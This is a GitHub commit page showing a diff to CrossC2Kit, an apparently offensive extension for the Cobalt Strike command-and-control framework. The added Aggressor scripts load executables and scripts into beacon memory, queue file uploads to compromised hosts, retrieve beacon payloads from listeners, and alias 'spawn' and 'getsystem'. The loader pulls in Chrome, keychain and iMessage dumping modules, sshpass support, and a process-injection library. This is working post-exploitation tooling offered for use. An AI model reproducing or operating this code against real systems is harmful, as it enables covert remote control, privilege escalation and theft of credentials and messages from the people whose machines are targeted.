Skip to content

Commit

Permalink
Merge pull request #118 from gloxec/CrossC2Kit-dev
Browse files Browse the repository at this point in the history 
Update CrossC2Kit & support inject and sshpass

Former-commit-id: fd8bfcd
  • Loading branch information
@gloxec
gloxec authored Sep 13, 2021
2 parents 7a188fb + a13578b commit 8efd045
Show file tree
Hide file tree
Showing 7 changed files with 525 additions and 30 deletions.
193 changes: 190 additions & 3 deletions CrossC2Kit/CrossC2Kit.cna
View file
Original file line number Diff line number Diff line change
Expand Up @@ -133,7 +133,7 @@ sub bcrossc2_load_dyn_pro {
berror($beaconid, "[ CrossC2 ]: dynamic lib or executable filetype not found");
}
$ELFName = genTaskinfo_dyn($taskType, $taskName, $taskResType, $taskNeedRun, $taskNeedPersistence, $taskXorKey, $juicySize, $taskArgs);
bupload_raw($beaconid,$ELFName,$juicyData);
bupload_raw!($beaconid,$ELFName,$juicyData);
}

sub bcrossc2_load_dyn {
Expand Down Expand Up @@ -163,7 +163,7 @@ sub bcrossc2_load_dyn {
berror($beaconid, "[ CrossC2 ]: dynamic lib or executable filetype not found");
}
$ELFName = genTaskinfo_dyn($taskType, $taskName, $taskResType, $taskNeedRun, $taskNeedPersistence, $taskXorKey, $juicySize, $taskArgs);
bupload_raw($beaconid,$ELFName,$juicyData);
bupload_raw!($beaconid,$ELFName,$juicyData);
}

sub brun_script_in_mem {
Expand All @@ -187,5 +187,192 @@ sub brun_script_in_mem {
$juicySize = lof($loadFileName);

$scriptName = genMemScriptInfo($scriptType, $scriptEngPath, $taskResType, $juicySize, $taskArgs);
bupload_raw($beaconid,$scriptName,$juicyData);
bupload_raw!($beaconid,$scriptName,$juicyData);
}

@fileupload_list = @();
global(@fileupload_list);
sub bawait_upload {
local('$bid $file_lpath $file_rpath $file_rname $file_data $file_size $cb $handle $file_list_count');
$bid = $1;
$file_lpath = $2;
$file_rpath = $3;
$file_rname = $4;
$cb = $5;
$cb_args = $6;
$handle = openf($file_lpath);
$file_data = readb($handle, -1);
closef($handle);
$file_size = lof($file_lpath);

btask($bid, 'upload file '.$file_lpath.' to '.$file_rpath.$file_rname);

$file_list_count = size(@fileupload_list);
add(@fileupload_list, @($bid, $file_lpath, $file_rpath, $file_rname, $file_size, $cb, $cb_args, 'false' 'false'));
bupload_raw!($bid, $file_rpath.'/'.$file_rname, $file_data);
}

sub bawait_upload_raw {
local('$bid $file_lpath $file_rpath $file_rname $file_data $file_size $cb $handle $file_list_count');
$bid = $1;
$file_data = $2;
$file_rpath = $3;
$file_rname = $4;
$cb = $5;
$cb_args = $6;
$file_size = strlen($file_data);
$file_lpath = random_string(10);

btask($bid, 'upload rawData file-['.$file_lpath.'] to '.$file_rpath.$file_rname);

$file_list_count = size(@fileupload_list);
add(@fileupload_list, @($bid, $file_lpath, $file_rpath, $file_rname, $file_size, $cb, $cb_args, 'false' 'false'));
bupload_raw!($bid, $file_rpath.'/'.$file_rname, $file_data);
}

sub bcheck_file_size {
this('$bid $file_path $file_name $file_size $realsize $name $temp $f_rname $f_match_size ');
$bid = $1;
$file_path = $2;
$file_name = $3;
$file_size = $4;

bls($bid, $file_path, lambda({
this('@lines @subl $type $s $lastmod $name');
this('$file_name $file_size $realsize $f_key $f_value $f_rname')
@lines = split("\n", ["$3" trim]);
@subl = sublist(@lines, 1);
foreach $temp (@subl) {
($type, $s, $lastmod, $name) = split("\t", $temp);
if ($name eq $file_name) {
$realsize = long($s);
if ($realsize >= $file_size) {
foreach $f_key => $f_value (@fileupload_list) {
$f_rname = $f_value[3];
if ($name eq $f_rname) {
@fileupload_list[$f_key][7] = 'true';
break;
}
}
}
break;
}
}
}, $file_name => $file_name, $file_size => $file_size)
);
}
on heartbeat_1s {
local('$f_key $f_value $f_bid $f_lpath $f_rpath $f_rname $f_size $f_func $f_match_size');
if (size(@fileupload_list) > 0) {
foreach $f_key => $f_value (@fileupload_list) {
$f_bid = $f_value[0];
$f_lpath = $f_value[1];
$f_rpath = $f_value[2];
$f_rname = $f_value[3];
$f_size = $f_value[4];
$f_cb = $f_value[5];
$f_cb_args = $f_value[6];
$f_match_size = $f_value[7];
$f_cb_runed = $f_value[8];

if ($f_match_size eq 'false') {
bcheck_file_size($f_bid, $f_rpath, $f_rname, $f_size);
}
if ($f_match_size eq 'true') {
if ($f_cb_runed eq 'false') {
@fileupload_list[$f_key][8] = 'true';
[$f_cb: $f_bid, $f_cb_args];
break;
}
}
}
foreach $f_key => $f_value (@fileupload_list) {
$f_match_size = $f_value[7];
if ($f_match_size eq 'true') {
removeAt(@fileupload_list, int($f_key));
break;
}
}
}
}

ssh_alias list_uploadingFile {
println(@fileupload_list);
$bid = $1;
local('$f_key $f_value $f_bid $f_lpath $f_rpath $f_rname $f_size $f_func $f_match_size');
if (size(@fileupload_list) > 0) {
foreach $f_key => $f_value (@fileupload_list) {
$f_bid = $f_value[0];
$f_lpath = $f_value[1];
$f_rpath = $f_value[2];
$f_rname = $f_value[3];
$f_size = $f_value[4];
$f_cb = $f_value[5];
$f_cb_args = $f_value[6];
$f_match_size = $f_value[7];
$f_cb_runed = $f_value[8];
blog($bid, $f_lpath);
}
}
}

sub getCrossC2Site {
local('%beacon_site $beacon_count $Description, $Proto, $Host, $Port, $URI');
%beacon_site = %();
$beacon_count = 0;
foreach $site_list(sites()) {
($Description, $Proto, $Host, $Port, $URI) = values($site_list, @('Description', 'Proto', 'Host', 'Port', 'URI'));
if ("CrossC2" isin $Description) {
$beaconURL = $Proto.$Host.':'.$Port.$URI;
# 返回beacon_uri & beacon_description
%beacon_site[$beacon_count] = @($Description, $beaconURL);
$beacon_count += 1;
}
}
return %beacon_site;
}

sub getCrossC2Listener {
local('%beacon_listener $beacon_count');
%beacon_listener = %();
$beacon_count = 0;
foreach $listener(listeners_local()) {
if ("CrossC2" isin $listener) {
%beacon_listener[$beacon_count] = @($listener);
$beacon_count += 1;
}
}
return %beacon_listener;
}

sub getSSHSession {
local('%sessionMap $sessionCount');
%sessionMap = %();
$sessionCount = 0;
foreach $beacon (beacons()) {
($internal, $computer) = values($beacon, @('internal', 'computer'));
$tempMenuBar = $internal."@".$computer;
if (!-isactive $beacon['id']) {
} else if (-isssh $beacon['id']) {
%sessionMap[$sessionCount] = @($tempMenuBar);
$sessionCount += 1;
}
}
return %sessionMap;
}

sub getCrossC2Beacon {
local('$listener $type $beaconData');
$listener = $1;
$type = $2;

$beaconData = $null;
if ($listener && $type) {
if ($type eq 'lib') {
$beaconData = listener_info($listener)['CrossC2libBeacon'];
} else if ($type eq 'main') {
$beaconData = listener_info($listener)['CrossC2Beacon'];
}
}
return $beaconData;
}
34 changes: 10 additions & 24 deletions CrossC2Kit/CrossC2Kit_Loader.cna
View file
Original file line number Diff line number Diff line change
Expand Up @@ -14,6 +14,8 @@ include(script_resource("gather/browser/chrome_dump.cna"));
include(script_resource("gather/keychain/keychain_dump.cna"));
include(script_resource("gather/message/iMessage_dump.cna"));
include(script_resource("utils/portscan_result.cna"));
include(script_resource("process/processhelper.cna"));
include(script_resource("sshpass/sshpass.cna"));

sub openMemoryFileLoadDialogCallBack {
$taskFile = $3['taskFile'];
Expand Down Expand Up @@ -55,7 +57,7 @@ sub openMemoryFileLoadDialog {

sub openPythonImportDialogDialogCallBack {
$pythonFile = $3['pythonFile'];
blog($beaconid, $pythonFile);
btask($beaconid, $pythonFile);
$taskResType = "info"; # info -> normal message
$scriptType = 'python-import$';
$scriptEnginePath = 'null';
Expand All @@ -67,7 +69,7 @@ sub openPythonImportDialogDialogCallBack {
$filename = substr($scriptLocalPath, $pathIndex);

$importName = substr($filename, 0, lindexOf($filename, '.'));
blog($1, "[Python]: import ".$importName);
btask($1, "[Python]: import ".$importName);
$scriptType = $scriptType.$importName;

if ($scriptType && $scriptLocalPath) {
Expand Down Expand Up @@ -103,7 +105,7 @@ sub openRunMemoryFileDialogCallBack {
} else {
$shell = "cc2-run ".$fileAliasName." ".$taskArgs;
}
blog($beaconid, "[shell]: shell ".$shell);
btask($beaconid, "[shell]: shell ".$shell);
bshell($beaconid, $shell);
}

Expand All @@ -124,7 +126,7 @@ sub openRunMemoryFileDialog {
sub openSetEnvDialogCallBack {
$envKey = $3['envKey'];
$envValue = $3['envValue'];
blog($beaconid, "[shell]: shell setenv $envKey $envValue");
btask($beaconid, "[shell]: shell setenv $envKey $envValue");
bshell($beaconid, "setenv $envKey $envValue");
}

Expand All @@ -145,19 +147,10 @@ popup ssh {
menu "&Access" {
item "&Elevate" { openElevateDialog($1); }
}
menu "&Explore" {
item "&File Browser" {
local('$bid');
foreach $bid ($1) {
openFileBrowser($bid);
}
}
item "&Process List" { openProcessBrowser($1); }
}
menu "&CrossC2 Kit" {
menu "&executable" {
item "&list" {
blog($1, "[shell]: shell cc2-memoryList");
btask($1, "[shell]: shell cc2-memoryList");
bshell($1, "cc2-memoryList");
}
item "&load" {
Expand All @@ -176,28 +169,21 @@ popup ssh {
openPythonImportDialog($1);
}
}
item "&Spawn" {
local('$bid');
foreach $bid ($1) {
blog($bid, "[shell]: shell spawn");
bshell($bid, "spawn");
}
}
}

ssh_alias spawn {
blog($1, "[shell]: shell spawn");
btask($1, "[shell]: shell spawn");
bshell($1, "spawn");
}

ssh_alias getsystem {
blog($1, "[shell]: shell getsystem");
btask($1, "[shell]: shell getsystem");
bshell($1, "getsystem");
}

ssh_alias setenv {
if($2 && $3){
blog($1, "[shell]: shell setenv $2 $3");
btask($1, "[shell]: shell setenv $2 $3");
bshell($1, "setenv $2 $3");
} else {
berror($1, "*[error]: setenv env_name env_value");
Expand Down
Binary file added CrossC2Kit/process/libinjector64.so
View file
Binary file not shown.
Loading

0 comments on commit 8efd045

Please sign in to comment.